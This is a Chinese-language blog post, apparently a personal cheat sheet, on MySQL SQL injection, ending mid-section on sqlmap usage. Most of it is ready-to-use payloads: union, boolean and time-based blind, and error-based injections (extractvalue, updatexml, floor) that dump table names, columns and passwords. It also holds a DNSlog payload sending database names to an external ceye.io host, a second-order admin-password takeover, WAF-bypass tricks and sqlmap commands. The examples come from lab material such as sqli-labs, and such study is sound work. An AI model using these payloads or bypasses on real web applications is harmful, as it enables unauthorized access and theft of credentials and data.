<!DOCTYPE html>
<html lang="zh-CN">

<head>

  <!-- Minima -->
  <!-- Hexo theme created by @adisaktijrs -->

  <!-- Basic Page Needs
  –––––––––––––––––––––––––––––––––––––––––––––––––– -->
  <meta charset="utf-8">

  
  <title>SQL注入</title>
  
  <link rel="canonical" href="https://ja1e.github.io/2021/11/23/sql%E6%B3%A8%E5%85%A5/">
  
  <meta name="description" content="数据库结构Access：  表名 列名 数据      mysql、mssql、Oracle、MongoDB：  数据库名 表名 列名 数据        MYSQL注入查询方式select查询语句在网站应用中进行数据显示查询操作。 查库： SELECT schema_name FROM infor">
  
  
  <meta name="author" content="Ja1e">
  
  
  
  <meta property="og:site_name" content="Ja1e" />
  <meta property="og:type" content="article" />
  <meta property="og:title" content="SQL注入" />
  
  <meta property="og:description" content="数据库结构Access：  表名 列名 数据      mysql、mssql、Oracle、MongoDB：  数据库名 表名 列名 数据        MYSQL注入查询方式select查询语句在网站应用中进行数据显示查询操作。 查库： SELECT schema_name FROM infor">
  
  <meta property="og:url" content="https://ja1e.github.io/2021/11/23/sql%E6%B3%A8%E5%85%A5/" />

  <meta name="twitter:card" content="summary_large_image">
  <meta name="twitter:title" content="SQL注入">
  
  <meta name="twitter:description" content="数据库结构Access：  表名 列名 数据      mysql、mssql、Oracle、MongoDB：  数据库名 表名 列名 数据        MYSQL注入查询方式select查询语句在网站应用中进行数据显示查询操作。 查库： SELECT schema_name FROM infor">
  
  
  
  
  <meta name="twitter:url" content="https://ja1e.github.io/2021/11/23/sql%E6%B3%A8%E5%85%A5/" />

  <!-- Mobile Specific Metas
  –––––––––––––––––––––––––––––––––––––––––––––––––– -->
  <meta name="viewport" content="width=device-width, initial-scale=1">

  <!-- Preload fonts
  –––––––––––––––––––––––––––––––––––––––––––––––––– -->
  <link rel="preload" href="/fonts/dm-serif-display-v4-latin-regular.woff2" as="font" type="font/woff2" crossorigin>
  <link rel="preload" href="/fonts/inter-v2-latin-regular.woff2" as="font" type="font/woff2" crossorigin>

  <!-- CSS
  –––––––––––––––––––––––––––––––––––––––––––––––––– -->
  
<link rel="stylesheet" href="/css/normalize.css">

  
<link rel="stylesheet" href="/css/skeleton.css">

  
<link rel="stylesheet" href="/css/custom.css">

  
<link rel="stylesheet" href="/css/prism-dark.css">

  
<link rel="stylesheet" href="/css/prism-line-numbers.css">

  <!-- User css -->
  
  
<link rel="stylesheet" href="/css/user.css">

  

  <!-- Favicon
  –––––––––––––––––––––––––––––––––––––––––––––––––– -->
  <link rel="icon" type="image/png" href="/images/favicon.png">

  <!-- Custom Theme Color Style
  –––––––––––––––––––––––––––––––––––––––––––––––––– -->
  <style>
  a:not(.icon) {
    text-decoration-color: #0FA0CE;
    background-image: linear-gradient(
      to bottom,
      rgba(0, 0, 0, 0) 50%,
      #0FA0CE 50%
    );
  }
  blockquote {
    border-left: 8px solid #0FA0CE;
  }
  .nanobar .bar {
    background: #0FA0CE;
  }
  .button.button-primary:hover,
  button.button-primary:hover,
  input[type="submit"].button-primary:hover,
  input[type="reset"].button-primary:hover,
  input[type="button"].button-primary:hover,
  .button.button-primary:focus,
  button.button-primary:focus,
  input[type="submit"].button-primary:focus,
  input[type="reset"].button-primary:focus,
  input[type="button"].button-primary:focus {
    background-color: #0FA0CE;
    border-color: #0FA0CE;
  }
  input[type="email"]:focus,
  input[type="number"]:focus,
  input[type="search"]:focus,
  input[type="text"]:focus,
  input[type="tel"]:focus,
  input[type="url"]:focus,
  input[type="password"]:focus,
  textarea:focus,
  select:focus {
    border: 1px solid #0FA0CE;
  }
</style>

  <!-- Google Analytics (With Privacy Settings On)
  –––––––––––––––––––––––––––––––––––––––––––––––––– -->
  

  
  <script src="/js/pic.min.js" defer></script>
  

  

<meta name="generator" content="Hexo 6.1.0"></head>

<body>
  <div class="container">
    <div class="row">
      <div>

        <div class="row">
  <div class="two columns" style="max-width: 50px">
    <h1 class="mt-2 mode">
      <div onclick=setDarkMode(true) id="darkBtn">🌑</div>
      <div onclick=setDarkMode(false) id="lightBtn" class=hidden>☀️</div>
      <script >
        if (localStorage.getItem('preferredTheme') == 'dark') {
          setDarkMode(true)
        }
        function setDarkMode(isDark) {
          var darkBtn = document.getElementById('darkBtn')
          var lightBtn = document.getElementById('lightBtn')
          if (isDark) {
            lightBtn.style.display = "block"
            darkBtn.style.display = "none"
            localStorage.setItem('preferredTheme', 'dark');
          } else {
            lightBtn.style.display = "none"
            darkBtn.style.display = "block"
            localStorage.removeItem('preferredTheme');
          }
          document.body.classList.toggle("darkmode");
        }
      </script>
    </h1>
  </div>

  <div class="six columns ml-1">
    <h1 class="mt-2">
      Hi Folks.
    </h1>
  </div>

  <div class="twelve columns">
    <div class="row">
      <div class="nine columns left">
        <a href="/">Home</a>
        
          
          <a href="/About" class="ml">About</a>
          
        
        
      </div>
    </div>
    <hr style="margin-bottom: 2.6rem">
  </div>
</div>
<link rel="stylesheet" href="/js/prism/prism.css">
        <div class="trans">
            <h2>SQL注入</h2>

  <h1 id="数据库结构"><a href="#数据库结构" class="headerlink" title="数据库结构"></a>数据库结构</h1><p>Access：</p>
<ul>
<li>表名<ul>
<li>列名<ul>
<li>数据</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>mysql、mssql、Oracle、MongoDB：</p>
<ul>
<li>数据库名<ul>
<li>表名<ul>
<li>列名<ul>
<li>数据</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<h1 id="MYSQL注入"><a href="#MYSQL注入" class="headerlink" title="MYSQL注入"></a>MYSQL注入</h1><h2 id="查询方式"><a href="#查询方式" class="headerlink" title="查询方式"></a>查询方式</h2><h3 id="select查询语句"><a href="#select查询语句" class="headerlink" title="select查询语句"></a>select查询语句</h3><p>在网站应用中进行数据显示查询操作。</p>
<p><strong>查库</strong>：</p>
<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">SELECT schema_name FROM information_schema.schemata<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><strong>查表</strong>：</p>
<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">SELECT table_name FROM information_schema.tables WHERE table_schema&#x3D;&#39;security&#39;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><strong>查列</strong>：</p>
<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">SELECT column_name FROM information_schema.columns WHERE table_name&#x3D;&#39;users&#39;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><strong>查字段</strong>：</p>
<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">SELECT username FROM security.users<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>



<h3 id="insert插入语句"><a href="#insert插入语句" class="headerlink" title="insert插入语句"></a>insert插入语句</h3><p>在网站应用中进行用户注册添加等操作。</p>
<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">INSERT INTO news(id,url,name) VALUES(2,&#39;x&#39;,&#39;abc&#39;);<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>



<h3 id="delete删除语句"><a href="#delete删除语句" class="headerlink" title="delete删除语句"></a>delete删除语句</h3><p>后台管理里面删除文章删除用户等操作。</p>
<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">DELETE FROM news WHERE id&#x3D;1;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>



<h3 id="update更新数据"><a href="#update更新数据" class="headerlink" title="update更新数据"></a>update更新数据</h3><p>会员或后台中心数据同步或缓存等操作。</p>
<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">UPDATE user SET pwd&#x3D;123 WHERE id&#x3D;2 and username&#x3D;&#39;admin&#39;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>



<h2 id="有回显注入"><a href="#有回显注入" class="headerlink" title="有回显注入"></a>有回显注入</h2><p><strong>联合查询</strong></p>
<p>查列数：order by 4</p>
<p>联合查询：union select 1,2,3,……</p>
<p>在有回显的数字替换成查询语句即可。</p>
<h2 id="无回显盲注"><a href="#无回显盲注" class="headerlink" title="无回显盲注"></a>无回显盲注</h2><h3 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h3><p>regexp、like、ascii、left、ord、mid</p>
<p>一般配合py脚本注入。</p>
<p>猜<strong>当前数据库名</strong>第一位字母：</p>
<pre class="line-numbers language-none"><code class="language-none">&#39;and left(database(),1)&#x3D;&#39;s&#39;--+ 
&#39;and substr(database(),1,1)&#x3D;&#39;s&#39;--+
&#39;and ascii(substr(database(),1,1))&#x3D;115--+ <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>猜<strong>第六个数据库名</strong>的第一个字母的ascii码：</p>
<pre class="line-numbers language-none"><code class="language-none">&#39;and ascii(substr((select schema_name from information_schema.schemata limit 5,1),1,1))&#x3D;115--+<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>判断security库中的第四个表的数据的第一位的ascii码：</p>
<pre class="line-numbers language-none"><code class="language-none">&#39;and ascii(substr((select table_name from information_schema.tables where table_schema&#x3D;&#39;security&#39; limit 3,1),1,1))&gt;11--+<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>判断表中<strong>字段</strong>：</p>
<pre class="line-numbers language-none"><code class="language-none">&#39;and ascii(substr((select column_name from information_schema.columns where table_name &#x3D; &#39;security&#39; limit 1,1),1,1))&gt;10--+
&#39;and ascii(substr((select username from security.users limit 0,1),1,1))&gt;10--+<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>



<h3 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h3><p>if、sleep</p>
<p>一般配合py脚本注入。</p>
<table>
<thead>
<tr>
<th>payload</th>
<th>解释</th>
</tr>
</thead>
<tbody><tr>
<td>?id&#x3D;1’ and if (ascii(substring(database(),1,1))&#x3D;67,sleep(5),1)–+</td>
<td>通过ascii码来比较</td>
</tr>
<tr>
<td>?id&#x3D;1’ and if (hex(substring(database(),1,1))&#x3D;FF,sleep(5),1)–+</td>
<td>通过十六进制值来比较</td>
</tr>
<tr>
<td>?id&#x3D;1’ and if (mid(database(),1,1)&#x3D;’s’,sleep(5),1)–+</td>
<td>使用mid函数代替substr</td>
</tr>
<tr>
<td>?id&#x3D;1’ and if (substr(database(),1,1)&#x3D;’s’,sleep(5),1)–+</td>
<td></td>
</tr>
<tr>
<td>?id&#x3D;1’ and if (left(database(),2)&#x3D;’se’,sleep(5),1)–+</td>
<td>截取左边两个个字符</td>
</tr>
<tr>
<td>?id&#x3D;1’ and if (right(database(),2)&#x3D;’ty’,sleep(5),1)–+</td>
<td>截取右边两个字符</td>
</tr>
</tbody></table>
<p>判断是否存在漏洞：’and sleep(5)–+</p>
<h3 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h3><p>页面无法显示数据库的信息，但是源码中有mysql输出错误的函数把mysql的错误回显到前端，也就是有报错内容的。<br>报错注入形式上一般是做两个嵌套的查询，里面的那个查询被称为子查询，执行顺序也是从子查询开始的，所以我们可以通过子查询查询我们想要的数据，然后在通过报错函数将我们查询到的数据带出，从而达到爆出想要查询的数据。</p>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/bc35f8dd4f7c">12种报错注入+万能语句 - 简书 (jianshu.com)</a></p>
<h4 id="extractvalue"><a href="#extractvalue" class="headerlink" title="extractvalue"></a>extractvalue</h4><p>mysql版本号大于5.1.5</p>
<p>对XML文档进行查询的函数。</p>
<p><code>EXTRACTVALUE(XML_document,XPath_string)</code>：从<code>XML_document</code>中返回所包含查询值的<code>XPath_string</code>。</p>
<p>第二个参数<code>XPath_String</code>是报错的关键，XML文档中查找字符位置是用<code>/xxx/xxx/xxx</code>这种格式，如果我们写入非法格式的内容就会报错，并且返回我们写入的非法格式内容，而这个非法的内容就是我们想要查询的内容。</p>
<p>paylaod：</p>
<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">EXTRACTVALUE(&#39;anything&#39;,[查询语句])<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>使用<code>concat()</code>能使查询语句输出的更加完整。</p>
<p><code>extractvalue()</code>报错一次只能回显出32位的数据，如果想要回显超过32位的数据，需要使用<code>substr(), mid(), left(), right()</code>之类的截断函数去截断数据分次输出。</p>
<p><strong>爆数据库名</strong>：</p>
<pre class="line-numbers language-none"><code class="language-none">&#39;and extractvalue(1,concat(0x7e,(select database())))--+<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><strong>爆表名</strong>：</p>
<pre class="line-numbers language-none"><code class="language-none">&#39;and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema&#x3D;database())))--+<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><strong>爆列名</strong>：</p>
<pre class="line-numbers language-none"><code class="language-none">&#39;and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name&#x3D;&#39;users&#39;)))--+<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><strong>爆数据</strong>：</p>
<pre class="line-numbers language-none"><code class="language-none">&#39;and extractvalue(1,concat(0x7e,(select group_concat(password) from users)))--+<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>



<h4 id="updatexml"><a href="#updatexml" class="headerlink" title="updatexml"></a>updatexml</h4><p>mysql版本号大于5.1.5</p>
<p>更新XML文档的函数。</p>
<p><code>UPDATEXML(XML_document,XPath_string,new_value);</code></p>
<p><code>updatexml()</code>的报错注入姿势和<code>extractvalue()</code>类似，也是第二个参数位置，输入非法字符，导致报错。</p>
<p>updatexml()和extractvalue()相同一次只能输出<code>32</code>位数据，要完整的输出数据只能使用截断函数进行截断分多次输出。</p>
<p><strong>爆数据库名</strong>：</p>
<pre class="line-numbers language-none"><code class="language-none">&#39;and updatexml(1,concat(0x7e,(select database())),0x7e)--+<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><strong>爆表名</strong>：</p>
<pre class="line-numbers language-none"><code class="language-none">&#39;and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema&#x3D;database())),0x7e)--+<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><strong>爆列名</strong>：</p>
<pre class="line-numbers language-none"><code class="language-none">&#39;and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name&#x3D;&#39;users&#39;)),0x7e)--+<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><strong>爆数据</strong>：</p>
<pre class="line-numbers language-none"><code class="language-none">&#39;and updatexml(1,concat(0x7e,(select group_concat(password)from users)),0x7e)--+<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>



<h4 id="floor"><a href="#floor" class="headerlink" title="floor"></a>floor</h4><p><a target="_blank" rel="noopener" href="https://www.freebuf.com/column/235496.html">Mysql报错注入之floor(rand(0)*2)报错原理探究 - FreeBuf网络安全行业门户</a></p>
<blockquote>
<p>这里需要先了解几个函数：<br>rand()随机函数，返回0~1之间的某个值<br>floor(a)取整函数，返回小于等于a,且值最接近a的一个整数<br>count()聚合函数也称作计数函数，返回查询对象的总数<br>group by x 分组语句，按照查询结果分组</p>
</blockquote>
<p>报错语句：</p>
<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">select count(*) from users group by concat(database(),floor(rand(0)*2));
select count(*),concat(database(),floor(rand(0)*2)) as x from users group by x;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>上面两句的含义是一模一样的，第二句只是把<code>concat(database(),floor(rand(0)*2))</code> 当做了<code>x</code>。</p>
<ul>
<li><code>floor(rand(0)*2))</code>：rand()函数每次产生的数都不同，但是通过一个固定的随机数的种子0之后，rand(0)可以形成固定的伪随机序列。所以<code>floor(rand(0)*2)</code>就会产生固定的数列<code>011011</code>。</li>
<li><code>group_by</code>：通过group by进行分组排序，结果会进行分组，相同名字为合并。</li>
<li><code>count(*)</code>：计数。</li>
</ul>
<p>对于语句：</p>
<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">select count(*) from users group by (floor(rand(0)*2));<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>小tips：<strong>在使用group by的时候，floor(rand(0)*2)会被执行一次，如果虚表不存在记录，插入虚表的时候floor(rand(0)*2)会再被执行一次</strong></p>
<p>执行流程：<code>floor(rand(0)*2))</code>第一次计算是0，虚表没有，于是插入虚表，注意此时<code>floor(rand(0)*2))</code>又会计算一次(第二次计算)，结果为1，所以插入虚表的值是1；然后<code>floor(rand(0)*2))</code>第三次计算结果是1，虚表里有，于是<code>count</code>直接加1；<code>floor(rand(0)*2))</code>第四次计算是0，虚表没有，于是插入虚表，此时<code>floor(rand(0)*2))</code>会再次计算（第五次计算）然后插入虚表，此时结果是1，但是虚表里已经有1了，所以导致了主键重复报错。</p>
<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">报错信息：ERROR 1062 (23000): Duplicate entry &#39;1&#39; for key &#39;&lt;group_key&gt;&#39;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>



<p><strong>爆数据库名：</strong></p>
<pre class="line-numbers language-none"><code class="language-none">&#39;and (select count(*) from users group by concat(database(),floor(rand(0)*2)))--+<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><strong>爆表名：</strong></p>
<pre class="line-numbers language-none"><code class="language-none">&#39;and (select count(*) from users group by concat((select group_concat(table_name) from information_schema.tables where table_schema&#x3D;database()),floor(rand(0)*2)))--+<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><strong>爆列名：</strong></p>
<pre class="line-numbers language-none"><code class="language-none">&#39;and (select count(*) from users group by concat((select group_concat(column_name) from information_schema.columns where table_name&#x3D;&#39;users&#39;),floor(rand(0)*2)))--+<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><strong>爆数据：</strong></p>
<pre class="line-numbers language-none"><code class="language-none">&#39;and (select count(*) from users group by concat((select password from security.users limit 0,1),floor(rand(0)*2)))--+<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>



<h2 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a>二次注入</h2><p>原理：攻击者构造恶意的数据并存储在数据库后，恶意数据被读取并进入到SQL查询语句所导致的注入。即输入恶意的数据库查询语句时会被转义，但在数据库调用读取语句时又被还原导致语句执行。</p>
<p><code>sqli-labs_Less24</code>为例：</p>
<p>先注册一个名为<code>admin&#39;#</code>的用户，然后登录改密码。</p>
<p>更改密码用的语句：</p>
<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">UPDATE users SET PASSWORD&#x3D;&#39;$pass&#39; where username&#x3D;&#39;$username&#39; and password&#x3D;&#39;$curr_pass&#39;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>这里<code>username</code>是<code>admin&#39;#</code>，所以语句变成了：</p>
<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">UPDATE users SET PASSWORD&#x3D;&#39;$pass&#39; where username&#x3D;&#39;admin&#39;#&#39; and password&#x3D;&#39;$curr_pass&#39;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><code>#</code>后面的都被注释了。变成了更改<code>admin</code>的密码。</p>
<p>可以用更改后的密码登录admin，或者结合<code>报错/盲注</code>进行数据库注入。</p>
<h2 id="dnslog注入"><a href="#dnslog注入" class="headerlink" title="dnslog注入"></a>dnslog注入</h2><p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/Xy--1/p/12896599.html">DNSlog注入学习 - Lushun - 博客园 (cnblogs.com)</a></p>
<p>我的：<a target="_blank" rel="noopener" href="http://ceye.io/">CEYE - 监控服务以进行安全测试</a></p>
<p>paylaod：</p>
<pre class="line-numbers language-none"><code class="language-none">select load_file(concat(&#39;\\\\&#39;,(select database()),&#39;.xhmmod.ceye.io&#x2F;abc&#39;));<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>



<h2 id="堆叠注入"><a href="#堆叠注入" class="headerlink" title="堆叠注入"></a>堆叠注入</h2><p>堆叠注入，顾名思义，就是将语句堆叠在一起进行查询</p>
<p><code>;</code></p>
<h2 id="基本函数参考"><a href="#基本函数参考" class="headerlink" title="基本函数参考"></a>基本函数参考</h2><table>
<thead>
<tr>
<th>函数</th>
<th>解释</th>
<th>payload</th>
</tr>
</thead>
<tbody><tr>
<td>database()</td>
<td>数据库名</td>
<td></td>
</tr>
<tr>
<td>user()</td>
<td>用户名</td>
<td></td>
</tr>
<tr>
<td>version()</td>
<td>数据库版本</td>
<td></td>
</tr>
<tr>
<td>@@version_compile_os</td>
<td>操作系统</td>
<td></td>
</tr>
<tr>
<td>concat()</td>
<td>没有分隔符的连接字符串</td>
<td>concat(a,b)</td>
</tr>
<tr>
<td>concat_ws()</td>
<td>含有分隔符的连接字符串</td>
<td>concat_ws(‘:’,a,b)</td>
</tr>
<tr>
<td>group_concat()</td>
<td>一行显示出来，并以逗号分隔每一条数据</td>
<td></td>
</tr>
<tr>
<td>left(a,b)</td>
<td>从左侧截取a的前b位</td>
<td>left(database(),1)&#x3D;’s’</td>
</tr>
<tr>
<td>right(a,b)</td>
<td>从右侧截取a的前b位</td>
<td></td>
</tr>
<tr>
<td>regexp()</td>
<td>user()的结果是root，regexp为匹配root的正则表达式</td>
<td>select user() regexp ‘r’</td>
</tr>
<tr>
<td>substr(a,b,c)</td>
<td>从b位置开始，截取a字符串的c长度</td>
<td></td>
</tr>
<tr>
<td>mid(a,b,c)</td>
<td>从b位置开始，截取a字符串的c位</td>
<td></td>
</tr>
<tr>
<td>length()</td>
<td>返回字符串的长度</td>
<td></td>
</tr>
<tr>
<td>ascii()</td>
<td>将字符串转化为ascii值</td>
<td>\</td>
</tr>
<tr>
<td>like</td>
<td>与regexp相似</td>
<td>select user() like ‘ro%’</td>
</tr>
<tr>
<td>load_file()</td>
<td>读取本地文件</td>
<td>select load_file(‘文件路径’)</td>
</tr>
<tr>
<td>into outfile</td>
<td>写文件(注意&#x2F;&#x2F;双写)</td>
<td>select ‘句子’ into outfile ‘文件路径及名称’</td>
</tr>
</tbody></table>
<h2 id="注释符使用"><a href="#注释符使用" class="headerlink" title="注释符使用"></a>注释符使用</h2><p>（GET提交方式）：</p>
<p>　　 – （后面有空格）</p>
<p>　　 %23</p>
<p>　　payload结尾单引号闭合</p>
<p>（POST提交方式）：</p>
<p>　　 – （后面有空格）</p>
<p>　　 #</p>
<p>　　 payload结尾单引号闭合</p>
<h2 id="异或注入"><a href="#异或注入" class="headerlink" title="异或注入"></a>异或注入</h2><p>当 <code>union</code>,<code>and</code> 被完全过滤掉了,就可以考虑使用异或注入 </p>
<p>异或运算规则: </p>
<p>&#x3D;&#x3D;1^1&#x3D;0	0^0&#x3D;0	0^1&#x3D;1&#x3D;&#x3D;</p>
<p>1^ 1^1&#x3D;0	1^ 1^0&#x3D;0</p>
<p>&#x3D;&#x3D;两真为假，两假为真&#x3D;&#x3D;</p>
<p><code>xor</code> 是逻辑上的异或操作；<code>^</code> 是前后进行二进制层面的异或运算</p>
<p>0^(ascii(substr((select(flag)from(flag)),1,1))&gt;1)</p>
<hr>
<h2 id="WAF绕过"><a href="#WAF绕过" class="headerlink" title="WAF绕过"></a>WAF绕过</h2><ol>
<li><p>大小写</p>
</li>
<li><p>关键字重复（双写）</p>
</li>
<li><p>关键字替换</p>
<p>​	<code>and</code> –&gt; <code>&amp;&amp;</code>        <code>or</code> –&gt; <code>||</code>         <code>like</code>–&gt; <code>=</code>        <code>&lt;&gt;</code>–&gt; <code>!=</code></p>
</li>
<li><p>fuzz大法</p>
</li>
<li><p>注释符绕过</p>
<p><code>/**/</code>空格用这个替换</p>
<p>&#x2F;* 这里可以填写很多内容  *&#x2F; </p>
<p>内联注释：<code>/*!union select */</code> 里面的东西是可以正常运行的，mysql特性。</p>
</li>
<li><p>特殊符号绕过</p>
<p>mysql 空白符： %09; %0A; %0B; %0D; %20; %0C; %A0; &#x2F;* xxx *&#x2F;</p>
<p>正则空白符：%09; %0A; %0B; %0D; %20;        %25就是百分号</p>
<p><code>union%23a%0aselect 1,2,3--+</code></p>
</li>
<li><p>函数分割符号  <code>concat/**/()</code>      <code>concat%2520()</code></p>
</li>
<li><p>浮点数法      <code>1E0</code>表示 <code>1*10^0</code></p>
</li>
<li><p>加密解密</p>
</li>
<li><p>编码解码</p>
</li>
<li><p>等价函数替换</p>
</li>
<li><p>更改提交方式</p>
</li>
<li><p>mysql黑语法</p>
<p>select {x schema_name} from {x information_scheam.schemata};</p>
<p>select {x 1};</p>
</li>
<li><p>当开启了魔术函数&#x3D;&#x3D;过滤了引号&#x3D;&#x3D;时，可以在引号前加上一个汉字双字节编码，可以实现绕过。</p>
<p>例如构造Payload为：</p>
<pre class="line-numbers language-none"><code class="language-none">username&#x3D;%BF&#39;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>%BF解码之后是中文乱码</p>
</li>
<li><p>用 &#x3D;&#x3D;&#x2F;*!50000%53elect*&#x2F;&#x3D;&#x3D; 代替select实现绕过</p>
<pre class="line-numbers language-none"><code class="language-none">select
&#x2F;*!50000%53elect*&#x2F;
order 
 &#x2F;*!50000%6Frder*&#x2F;
union
&#x2F;*!50000%75nion*&#x2F;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
</li>
<li><p>http参数污染，比如PHP&#x2F;Apache的服务器get方式提交时存在多个相同的参数名，只有最后一个生效。（不同中间件规则不同）</p>
<pre class="line-numbers language-none"><code class="language-none">例：?id&#x3D;1&#x2F;**&amp;id&#x3D;-1 union select 1,2,3#*&#x2F;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
</li>
<li><p>ip白名单，改<code>X-forwarded-for</code>、<code>X-remote-IP</code>、<code>X-originating-IP</code>、<code>X-remote-addr</code>、<code>X-Real-IP</code></p>
</li>
<li><p>静态资源</p>
</li>
</ol>
<pre class="line-numbers language-none"><code class="language-none">http:&#x2F;&#x2F;127.0.0.1&#x2F;index.php?id&#x3D;1 and 1&#x3D;1
http:&#x2F;&#x2F;127.0.0.1&#x2F;index.php&#x2F;x.txt?id&#x3D;1 and 1&#x3D;1	依然正常运行
http:&#x2F;&#x2F;127.0.0.1&#x2F;index.php&#x2F;admin.php?id&#x3D;1 and 1&#x3D;1	admin.php是在白名单里的没有拦截<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<ol start="19">
<li><p>爬虫白名单</p>
</li>
<li><p>当过滤了<code>information_schema</code>时<br>可以用<code>mysql.innodb_table_stats</code>代替<code>information_schema</code></p>
<p>InnoDb引擎<br>从MYSQL5.5.8开始，InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中，inndb增加了<code>innodb_index_stats</code>和<code>innodb_table_stats</code>两张表，这两张表中都存储了数据库和其数据表的信息，但是没有存储列名。</p>
<p>sys数据库<br>在5.7以上的MYSQL中，新增了sys数据库，该库的基础数据来自<code>information_schema</code>和<code>performance_chema</code>，其本身不存储数据。可以通过其中的<code>schema_auto_increment_columns</code>来获取表名。</p>
</li>
</ol>
<pre class="line-numbers language-none"><code class="language-none">1&amp;&amp;ascii(substr((select group_concat(table_name)from sys.x$schema_flattened_keys where table_schema&#x3D;database()),1,1))&#x3D;103

2||ascii(substr((select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema&#x3D;database()),&#123;&#125;,1))&#x3D;&#123;&#125;.format()<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<hr>
<h1 id="工具"><a href="#工具" class="headerlink" title="工具"></a>工具</h1><p>sqlmap、NoSQLAttack、Pangolin</p>
<p>Sqlmap使用：</p>
<p>一般：</p>
<pre class="line-numbers language-none"><code class="language-none">python sqlmap.py -u &quot;url&quot;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>加上<strong>脚本</strong>：</p>
<pre class="line-numbers language-none"><code class="language-none">python sqlmap.py -u &quot;url&quot; --tamper&#x3D;xxx.py<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>开<strong>代理</strong>（一般用于burp抓包分析）：</p>
<pre class="line-numbers language-none"><code class="language-none">python sqlmap.py -u &quot;url&quot; --proxy&#x3D;http:&#x2F;&#x2F;127.0.0.1:8080<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>随机<strong>Agent</strong>头：</p>
<pre class="line-numbers language-none"><code class="language-none">python sqlmap.py -u &quot;url&quot; --random-agent<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>指定爬虫Agent(百度)：</p>
<pre class="line-numbers language-none"><code class="language-none">python sqlmap.py -u &quot;url&quot; --user-agent&#x3D;&quot;Mozilla&#x2F;5.0 (compatible; Baiduspider&#x2F;2.0; +http:&#x2F;&#x2F;www.baidu.com&#x2F;search&#x2F;spider.html)&quot;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>加<strong>延迟</strong>：</p>
<pre class="line-numbers language-none"><code class="language-none">python sqlmap.py -u &quot;url&quot; --delay 1<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><strong>重写http头</strong>，可以借照post方式，直接以数据包形式扫。</p>
<pre class="line-numbers language-none"><code class="language-none">python sqlmap.py -r 数据包文件 <span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>参数值存在编码情况，<strong>中转注入</strong>，在本地写一个：</p>
